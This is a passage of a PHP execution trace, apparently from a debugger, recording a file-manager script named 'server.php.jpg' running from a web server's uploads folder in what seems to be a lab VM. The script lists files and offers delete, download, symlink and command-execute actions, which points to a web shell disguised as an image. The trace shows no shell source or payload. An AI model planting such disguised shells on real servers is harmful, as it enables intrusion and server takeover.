4	378	0	0.020193	802720	sizeof	0		/var/www/html/uploads/server.php.jpg	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	378	1	0.020263	802752
4	378	R			6
3		A						/var/www/html/uploads/server.php.jpg	1250	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	379	0	0.020304	802720	date	0		/var/www/html/uploads/server.php.jpg	1252	2	'n/j/y H:i:s'	1676243054
4	379	1	0.020335	803048
4	379	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1252	$timestamps = 'mtime: 2/12/23 18:04:14, '
4	380	0	0.020362	802664	date	0		/var/www/html/uploads/server.php.jpg	1253	2	'n/j/y H:i:s'	1676243054
4	380	1	0.020393	802992
4	380	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1253	$timestamps .= 'atime: 2/12/23 18:04:14, '
4	381	0	0.020422	802688	date	0		/var/www/html/uploads/server.php.jpg	1254	2	'n/j/y H:i:s'	1676243054
4	381	1	0.020506	803016
4	381	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1254	$timestamps .= 'ctime: 2/12/23 18:04:14'
4	382	0	0.020545	802912	html	1		/var/www/html/uploads/server.php.jpg	1258	1	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
5	383	0	0.020565	802912	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'	2	NULL
5	383	1	0.020588	803216
5	383	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	382	1	0.020616	803104
4	382	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	384	0	0.020644	802720	substr	0		/var/www/html/uploads/server.php.jpg	1289	3	'prepend.php'	0	1
4	384	1	0.020667	802816
4	384	R			'p'
4	385	0	0.020693	802800	urlencode	0		/var/www/html/uploads/server.php.jpg	1296	1	'/var/www/html/uploads/prepend.php'
4	385	1	0.020714	802912
4	385	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fprepend.php'
4	386	0	0.020756	802848	html	1		/var/www/html/uploads/server.php.jpg	1296	1	'prepend.php'
5	387	0	0.020777	802848	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'prepend.php'	2	NULL
5	387	1	0.020800	803120
5	387	R			'prepend.php'
4	386	1	0.020823	803008
4	386	R			'prepend.php'
3		A						/var/www/html/uploads/server.php.jpg	1306	$human = ''
4	388	0	0.020868	802720	decoct	0		/var/www/html/uploads/server.php.jpg	1315	1	33261
4	388	1	0.020888	802792
4	388	R			'100755'
4	389	0	0.020913	802720	function_exists	0		/var/www/html/uploads/server.php.jpg	1317	1	'posix_getuid'
4	389	1	0.020936	802760
4	389	R			TRUE
4	390	0	0.020961	802720	posix_getuid	0		/var/www/html/uploads/server.php.jpg	1317	0
4	390	1	0.020983	802720
4	390	R			33
3		A						/var/www/html/uploads/server.php.jpg	1317	$l = FALSE
4	391	0	0.021025	802720	permission_octal2string	1		/var/www/html/uploads/server.php.jpg	1319	1	33261
4		A						/var/www/html/uploads/server.php.jpg	966	$type = '-'
4		A						/var/www/html/uploads/server.php.jpg	979	$owner = 'r'
4		A						/var/www/html/uploads/server.php.jpg	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	987	$group = 'r'
4		A						/var/www/html/uploads/server.php.jpg	988	$group .= '-'
4		A						/var/www/html/uploads/server.php.jpg	992	$group .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	995	$other = 'r'
4		A						/var/www/html/uploads/server.php.jpg	996	$other .= '-'
4		A						/var/www/html/uploads/server.php.jpg	1000	$other .= 'x'
4	391	1	0.021201	802760
4	391	R			'-rwxr-xr-x'
4	392	0	0.021221	802760	html	1		/var/www/html/uploads/server.php.jpg	1319	1	'-rwxr-xr-x'
5	393	0	0.021240	802760	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'-rwxr-xr-x'	2	NULL
5	393	1	0.021260	803032
5	393	R			'-rwxr-xr-x'
4	392	1	0.021279	802920
4	392	R			'-rwxr-xr-x'
4	394	0	0.021297	802720	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1324	2	'owner_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	394	1	0.021336	802784
4	394	R			TRUE
4	395	0	0.021355	802720	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1330	2	'group_name'	['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	395	1	0.021390	802784
4	395	R			TRUE
4	396	0	0.021409	802816	html	1		/var/www/html/uploads/server.php.jpg	1339	1	'/var/www/html/uploads/prepend.php'
5	397	0	0.021427	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/prepend.php'	2	NULL
5	397	1	0.021448	803088
5	397	R			'/var/www/html/uploads/prepend.php'
4	396	1	0.021469	802976
4	396	R			'/var/www/html/uploads/prepend.php'
3		A						/var/www/html/uploads/server.php.jpg	1342	$actions = []
4	398	0	0.021506	802344	function_exists	0		/var/www/html/uploads/server.php.jpg	1343	1	'symlink'
4	398	1	0.021525	802384
4	398	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1344	$actions[] = 'create_symlink'
4	399	0	0.021558	802720	dirname	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads/prepend.php'
4	399	1	0.021576	802816
4	399	R			'/var/www/html/uploads'
4	400	0	0.021595	802784	is_writable	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads'
4	400	1	0.021621	802824
4	400	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.php.jpg	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.php.jpg	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/server.php.jpg	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/server.php.jpg	1353	$actions[] = 'download'
4	401	0	0.021710	802720	function_exists	0		/var/www/html/uploads/server.php.jpg	1356	1	'exec'
4	401	1	0.021733	802760
4	401	R			TRUE
4	402	0	0.021752	802720	file_exists	0		/var/www/html/uploads/server.php.jpg	1356	1	'/bin/sh'
4	402	1	0.021777	802760
4	402	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1357	$actions[] = 'execute'
4	403	0	0.021809	802720	sizeof	0		/var/www/html/uploads/server.php.jpg	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download', 6 => 'execute']
4	403	1	0.021835	802752
4	403	R			7
4	404	0	0.021853	802816	str_repeat	0		/var/www/html/uploads/server.php.jpg	1363	2	'&nbsp;'	30
4	404	1	0.021871	803104
4	404	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	405	0	0.021892	802784	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'create_symlink'
5	406	0	0.021910	802784	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'create symlink'	2	'UTF-8'
5	406	1	0.021931	803056
5	406	R			'create symlink'
4	405	1	0.021951	802944
4	405	R			'create symlink'
4	407	0	0.021970	802776	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'delete'
5	408	0	0.021987	802776	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'delete'	2	'UTF-8'
5	408	1	0.022006	803048
5	408	R			'delete'
4	407	1	0.022024	802936
4	407	R			'delete'
4	409	0	0.022042	802776	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'rename'
5	410	0	0.022058	802776	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'rename'	2	'UTF-8'
5	410	1	0.022078	803048
5	410	R			'rename'
4	409	1	0.022096	802936
4	409	R			'rename'
4	411	0	0.022114	802768	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'move'
5	412	0	0.022131	802768	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'move'	2	'UTF-8'
5	412	1	0.022150	803040
5	412	R			'move'
4	411	1	0.022167	802928
4	411	R			'move'
4	413	0	0.022185	802768	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'copy'
5	414	0	0.022202	802768	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'copy'	2	'UTF-8'
5	414	1	0.022220	803040
5	414	R			'copy'
4	413	1	0.022238	802928
4	413	R			'copy'
4	415	0	0.022256	802776	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'download'
5	416	0	0.022272	802776	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'download'	2	'UTF-8'
5	416	1	0.022291	803048
5	416	R			'download'
4	415	1	0.022309	802936
4	415	R			'download'
4	417	0	0.022328	802776	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'execute'
5	418	0	0.022345	802776	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'execute'	2	'UTF-8'
5	418	1	0.022364	803048
5	418	R			'execute'
4	417	1	0.022382	802936
4	417	R			'execute'
3		A						/var/www/html/uploads/server.php.jpg	1249	$i++
4	419	0	0.022414	802720	sizeof	0		/var/www/html/uploads/server.php.jpg	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	419	1	0.022508	802752
4	419	R			6
3		A						/var/www/html/uploads/server.php.jpg	1250	$file = ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	420	0	0.022562	802720	date	0		/var/www/html/uploads/server.php.jpg	1252	2	'n/j/y H:i:s'	1676243054
4	420	1	0.022603	803048
4	420	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1252	$timestamps = 'mtime: 2/12/23 18:04:14, '
4	421	0	0.022639	802664	date	0		/var/www/html/uploads/server.php.jpg	1253	2	'n/j/y H:i:s'	1676243054
4	421	1	0.022678	802992
4	421	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1253	$timestamps .= 'atime: 2/12/23 18:04:14, '
4	422	0	0.022713	802688	date	0		/var/www/html/uploads/server.php.jpg	1254	2	'n/j/y H:i:s'	1676243054
4	422	1	0.022751	803016
4	422	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1254	$timestamps .= 'ctime: 2/12/23 18:04:14'
4	423	0	0.022792	802912	html	1		/var/www/html/uploads/server.php.jpg	1258	1	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
5	424	0	0.022812	802912	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'	2	NULL
5	424	1	0.022834	803216
5	424	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	423	1	0.022855	803104
4	423	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	425	0	0.022876	802720	substr	0		/var/www/html/uploads/server.php.jpg	1289	3	'server.php.jpg'	0	1
4	425	1	0.022894	802816
4	425	R			's'
4	426	0	0.022913	802800	urlencode	0		/var/www/html/uploads/server.php.jpg	1296	1	'/var/www/html/uploads/server.php.jpg'
4	426	1	0.022931	802912
4	426	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fserver.php.jpg'
4	427	0	0.022953	802848	html	1		/var/www/html/uploads/server.php.jpg	1296	1	'server.php.jpg'
5	428	0	0.022970	802848	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'server.php.jpg'	2	NULL
5	428	1	0.022989	803120
5	428	R			'server.php.jpg'
4	427	1	0.023008	803008
4	427	R			'server.php.jpg'
4	429	0	0.023028	802720	human_filesize	1		/var/www/html/uploads/server.php.jpg	1304	1	77659
4		A						/var/www/html/uploads/server.php.jpg	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.php.jpg	1155	$n = 0
4		A						/var/www/html/uploads/server.php.jpg	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.php.jpg	1158	$n++
5	430	0	0.023101	802720	strpos	0		/var/www/html/uploads/server.php.jpg	1161	2	75.8388671875	'.'
5	430	1	0.023129	803048
5	430	R			2
5	431	0	0.023146	802720	round	0		/var/www/html/uploads/server.php.jpg	1161	2	75.8388671875	1
5	431	1	0.023164	802792
5	431	R			75.8
4		A						/var/www/html/uploads/server.php.jpg	1161	$filesize = 75.8
5	432	0	0.023196	802720	strpos	0		/var/www/html/uploads/server.php.jpg	1163	2	75.8	'.'
5	432	1	0.023214	803048
5	432	R			2
5	433	0	0.023231	802720	substr	0		/var/www/html/uploads/server.php.jpg	1164	3	75.8	-1	1
5	433	1	0.023249	803072
5	433	R			'8'
5	434	0	0.023266	802720	in_array	0		/var/www/html/uploads/server.php.jpg	1164	2	'8'	[0 => '0', 1 => '.']
5	434	1	0.023287	802792
5	434	R			FALSE
5	435	0	0.023305	802720	substr	0		/var/www/html/uploads/server.php.jpg	1169	3	'kMGTPE'	0	1
5	435	1	0.023323	802816
5	435	R			'k'
4		A						/var/www/html/uploads/server.php.jpg	1169	$suffix = 'k'
4	429	1	0.023355	802752
4	429	R			'75.8 kB'
3		A						/var/www/html/uploads/server.php.jpg	1304	$human = ' title="75.8 kB"'
4	436	0	0.023390	802768	decoct	0		/var/www/html/uploads/server.php.jpg	1315	1	33204
4	436	1	0.023407	802840
4	436	R			'100664'
4	437	0	0.023425	802768	function_exists	0		/var/www/html/uploads/server.php.jpg	1317	1	'posix_getuid'
4	437	1	0.023443	802808
4	437	R			TRUE
4	438	0	0.023459	802768	posix_getuid	0		/var/www/html/uploads/server.php.jpg	1317	0
4	438	1	0.023476	802768
4	438	R			33
3		A						/var/www/html/uploads/server.php.jpg	1317	$l = FALSE
4	439	0	0.023506	802768	permission_octal2string	1		/var/www/html/uploads/server.php.jpg	1319	1	33204
4		A						/var/www/html/uploads/server.php.jpg	966	$type = '-'
4		A						/var/www/html/uploads/server.php.jpg	979	$owner = 'r'
4		A						/var/www/html/uploads/server.php.jpg	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	984	$owner .= '-'
4		A						/var/www/html/uploads/server.php.jpg	987	$group = 'r'
4		A						/var/www/html/uploads/server.php.jpg	988	$group .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	992	$group .= '-'
4		A						/var/www/html/uploads/server.php.jpg	995	$other = 'r'
4		A						/var/www/html/uploads/server.php.jpg	996	$other .= '-'
4		A						/var/www/html/uploads/server.php.jpg	1000	$other .= '-'
4	439	1	0.023655	802808
4	439	R			'-rw-rw-r--'
4	440	0	0.023673	802808	html	1		/var/www/html/uploads/server.php.jpg	1319	1	'-rw-rw-r--'
5	441	0	0.023691	802808	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'-rw-rw-r--'	2	NULL
5	441	1	0.023718	803080
5	441	R			'-rw-rw-r--'
4	440	1	0.023736	802968
4	440	R			'-rw-rw-r--'
4	442	0	0.023754	802768	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1324	2	'owner_name'	['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	442	1	0.023793	802832
4	442	R			TRUE
4	443	0	0.023811	802768	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1330	2	'group_name'	['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
4	443	1	0.023849	802832
4	443	R			TRUE
4	444	0	0.023867	802864	html	1		/var/www/html/uploads/server.php.jpg	1339	1	'/var/www/html/uploads/server.php.jpg'
5	445	0	0.023885	802864	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/server.php.jpg'	2	NULL
5	445	1	0.023905	803136
5	445	R			'/var/www/html/uploads/server.php.jpg'
4	444	1	0.023925	803024
4	444	R			'/var/www/html/uploads/server.php.jpg'
3		A						/var/www/html/uploads/server.php.jpg	1342	$actions = []
4	446	0	0.023961	802392	function_exists	0		/var/www/html/uploads/server.php.jpg	1343	1	'symlink'
4	446	1	0.023979	802432
4	446	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1344	$actions[] = 'create_symlink'
4	447	0	0.024010	802768	dirname	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads/server.php.jpg'
4	447	1	0.024028	802864
4	447	R			'/var/www/html/uploads'
4	448	0	0.024047	802832	is_writable	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads'
4	448	1	0.024071	802872
4	448	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.php.jpg	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.php.jpg	1349	$actions[] = 'move'
3		A						/var/www/html/uploads/server.php.jpg	1352	$actions[] = 'copy'
3		A						/var/www/html/uploads/server.php.jpg	1353	$actions[] = 'download'
4	449	0	0.024157	802768	function_exists	0		/var/www/html/uploads/server.php.jpg	1356	1	'exec'
4	449	1	0.024175	802808
4	449	R			TRUE
4	450	0	0.024192	802768	sizeof	0		/var/www/html/uploads/server.php.jpg	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move', 4 => 'copy', 5 => 'download']
4	450	1	0.024216	802800
4	450	R			6
4	451	0	0.024234	802864	str_repeat	0		/var/www/html/uploads/server.php.jpg	1363	2	'&nbsp;'	30
4	451	1	0.024252	803152
4	451	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	452	0	0.024273	802832	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'create_symlink'
5	453	0	0.024291	802832	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'create symlink'	2	'UTF-8'
5	453	1	0.024311	803104
5	453	R			'create symlink'
4	452	1	0.024330	802992
4	452	R			'create symlink'
4	454	0	0.024349	802824	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'delete'
5	455	0	0.024366	802824	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'delete'	2	'UTF-8'
5	455	1	0.024385	803096
5	455	R			'delete'
4	454	1	0.024403	802984
4	454	R			'delete'
4	456	0	0.024420	802824	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'rename'
5	457	0	0.024437	802824	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'rename'	2	'UTF-8'
5	457	1	0.024457	803096
5	457	R			'rename'
4	456	1	0.024506	802984
4	456	R			'rename'
4	458	0	0.024525	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'move'
5	459	0	0.024543	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'move'	2	'UTF-8'
5	459	1	0.024562	803088
5	459	R			'move'
4	458	1	0.024579	802976
4	458	R			'move'
4	460	0	0.024597	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'copy'
5	461	0	0.024614	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'copy'	2	'UTF-8'
5	461	1	0.024633	803088
5	461	R			'copy'
4	460	1	0.024651	802976
4	460	R			'copy'
4	462	0	0.024669	802824	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'download'
5	463	0	0.024691	802824	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'download'	2	'UTF-8'
5	463	1	0.024710	803096
5	463	R			'download'
4	462	1	0.024729	802984
4	462	R			'download'
3		A						/var/www/html/uploads/server.php.jpg	1249	$i++
4	464	0	0.024762	802768	sizeof	0		/var/www/html/uploads/server.php.jpg	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => 